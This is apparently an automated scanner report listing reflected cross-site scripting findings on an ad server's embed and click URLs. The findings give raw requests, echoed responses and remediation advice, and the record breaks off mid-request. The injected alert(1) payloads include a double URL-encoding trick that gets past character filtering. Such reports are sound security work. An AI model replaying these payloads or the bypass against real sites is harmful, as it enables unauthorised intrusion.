Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1929
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... <a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a63135799764"><script>alert(1)</script>e90710d87cb/1354.0.iframe.200x33/" target="_blank" border="0" style="border:0px;"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94844%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb32014b325 was submitted in the REST URL parameter 3. This input was echoed as 94844"><script>alert(1)</script>b32014b325 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x3394844%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb32014b325/0.2084487870534576 HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1926
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... <a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x3394844"><script>alert(1)</script>b32014b325/" target="_blank" border="0" style="border:0px;"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cc53%2522%253balert%25281%2529%252f%252f862f59f63eb was submitted in the REST URL parameter 3. This input was echoed as 6cc53";alert(1)//862f59f63eb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x336cc53%2522%253balert%25281%2529%252f%252f862f59f63eb/0.2084487870534576 HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1884
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... <scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x336cc53";alert(1)//862f59f63eb/1290209590**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'"> ...[SNIP]...
The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ff13"-alert(1)-"56d7644f92 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2337
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... na42/M=757168.14413522.14266813.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1290214461/L=czMofdG_bJL9SQS9TNcPQwgcrnoX2kznABwAB9wc/B=aPIEAkJe5hQ-/J=1290207261066372/K=0W5te92hxHgwSAHJM5kSlg/A=6192643/R=0/*4ff13"-alert(1)-"56d7644f92"> ...[SNIP]...
The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd7ff"><script>alert(1)</script>dc019ab0230 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2369
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... na42/M=757168.14413522.14266813.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1290214461/L=czMofdG_bJL9SQS9TNcPQwgcrnoX2kznABwAB9wc/B=aPIEAkJe5hQ-/J=1290207261066372/K=0W5te92hxHgwSAHJM5kSlg/A=6192643/R=0/*dd7ff"><script>alert(1)</script>dc019ab0230http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/" target="_blank" border="0" style="border:0px;"> ...[SNIP]...
2.39. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c6f8"-alert(1)-"5117fe222e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2345
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... a42/M=757168.14413522.14266813.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1290214461/L=czMofdG_bJL9SQS9TNcPQwgcrnoX2kznABwAB9wc/B=aPIEAkJe5hQ-/J=1290207261066372/K=0W5te92hxHgwSAHJM5kSlg/A=6192643/R=0/*&8c6f8"-alert(1)-"5117fe222e0=1"> ...[SNIP]...
2.40. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b283c"><script>alert(1)</script>008acd22d8c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2375
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... a42/M=757168.14413522.14266813.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1290214461/L=czMofdG_bJL9SQS9TNcPQwgcrnoX2kznABwAB9wc/B=aPIEAkJe5hQ-/J=1290207261066372/K=0W5te92hxHgwSAHJM5kSlg/A=6192643/R=0/*&b283c"><script>alert(1)</script>008acd22d8c=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/" target="_blank" border="0" style="border:0px;"> ...[SNIP]...
The value of the 10,1,102,64;1920;1200;http%3A_@2F_@2Fmy.yahoo.com_@2F?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0d08'-alert(1)-'40c23d3dbd0 was submitted in the 10,1,102,64;1920;1200;http%3A_@2F_@2Fmy.yahoo.com_@2F?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4cdc67692496d; expires=Sun, 19-Dec-2010 23:33:27 GMT; path=/
Set-Cookie: i_1=46:1354:802:44:0:32947:1290209607:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; expires=Sun, 19-Dec-2010 23:33:27 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 724
function wsod_image() { document.write('<a href="http://global.ard.yahoo.com/SIG=15ljnna42/M=757168.14413522.14266813.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1290214461/L=czMofdG_bJL9SQS9TNcPQwgcrnoX2kznABwAB9wc/B=aPIEAkJe5hQ-/J=1290207261066372/K=0W5te92hxHgwSAHJM5kSlg/A=6192643/R=0/*b0d08'-alert(1)-'40c23d3dbd0http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1354.802.iframe.200x33/**;10.1102;1920;1200;http:_@2F_@2Fmy.yahoo.com_@2F" target="_blank" title="Online $7 Trades! Click to find out more!"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fab6b%2522%253balert%25281%2529%252f%252f4025c98bb28 was submitted in the REST URL parameter 2. This input was echoed as fab6b";alert(1)//4025c98bb28 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357fab6b%2522%253balert%25281%2529%252f%252f4025c98bb28/1354.0.iframe.200x33/1290207275** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1884
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... <scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357fab6b";alert(1)//4025c98bb28/1354.0.iframe.200x33/1290209590**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59a15%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e50fd7015941 was submitted in the REST URL parameter 2. This input was echoed as 59a15"><script>alert(1)</script>50fd7015941 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a63135759a15%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e50fd7015941/1354.0.iframe.200x33/1290207275** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1929
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... <a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a63135759a15"><script>alert(1)</script>50fd7015941/1354.0.iframe.200x33/" target="_blank" border="0" style="border:0px;"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e66a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0f40fdd33ec was submitted in the REST URL parameter 3. This input was echoed as 8e66a"><script>alert(1)</script>0f40fdd33ec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x338e66a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0f40fdd33ec/1290207275** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1929
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... <a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x338e66a"><script>alert(1)</script>0f40fdd33ec/" target="_blank" border="0" style="border:0px;"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50920%2522%253balert%25281%2529%252f%252f3c39df87c6c was submitted in the REST URL parameter 3. This input was echoed as 50920";alert(1)//3c39df87c6c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x3350920%2522%253balert%25281%2529%252f%252f3c39df87c6c/1290207275** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1884
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... <scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x3350920";alert(1)//3c39df87c6c/1290209593**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'"> ...[SNIP]...
2.46. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1290207275** [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2e20'-alert(1)-'7aac6d5594e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:35:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4cdc67692496d; expires=Sun, 19-Dec-2010 23:35:20 GMT; path=/
Set-Cookie: i_1=46:1354:798:44:0:32947:1290209720:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; expires=Sun, 19-Dec-2010 23:35:20 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 730
function wsod_image() { document.write('<a href="http://global.ard.yahoo.com/SIG=15ljnna42/M=757168.14413522.14266813.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1290214461/L=czMofdG_bJL9SQS9TNcPQwgcrnoX2kznABwAB9wc/B=aPIEAkJe5hQ-/J=1290207261066372/K=0W5te92hxHgwSAHJM5kSlg/A=6192643/R=0/*&d2e20'-alert(1)-'7aac6d5594e=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1354.798.iframe.200x33/**;10.1102;1920;1200;http:_@2F_@2Fmy.yahoo.com_@2F" target="_blank" title="Online $7 Trades! Click to find out more!" ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db92e%2522%253balert%25281%2529%252f%252fe91708cc198 was submitted in the REST URL parameter 2. This input was echoed as db92e";alert(1)//e91708cc198 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357db92e%2522%253balert%25281%2529%252f%252fe91708cc198/475.0.iframe.200x33/1290207264971902 HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:32:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1881
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... <scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357db92e";alert(1)//e91708cc198/475.0.iframe.200x33/1290209579**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b3e5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec39f7a1a8ef was submitted in the REST URL parameter 2. This input was echoed as 3b3e5"><script>alert(1)</script>c39f7a1a8ef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a6313573b3e5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec39f7a1a8ef/475.0.iframe.200x33/1290207264971902 HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:32:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1926
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... <a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a6313573b3e5"><script>alert(1)</script>c39f7a1a8ef/475.0.iframe.200x33/" target="_blank" border="0" style="border:0px;"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67d47%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2e3f3a3635d was submitted in the REST URL parameter 3. This input was echoed as 67d47"><script>alert(1)</script>2e3f3a3635d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x3367d47%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2e3f3a3635d/1290207264971902 HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1926
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... <a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x3367d47"><script>alert(1)</script>2e3f3a3635d/" target="_blank" border="0" style="border:0px;"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae354%2522%253balert%25281%2529%252f%252f424e1783b9d was submitted in the REST URL parameter 3. This input was echoed as ae354";alert(1)//424e1783b9d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33ae354%2522%253balert%25281%2529%252f%252f424e1783b9d/1290207264971902 HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
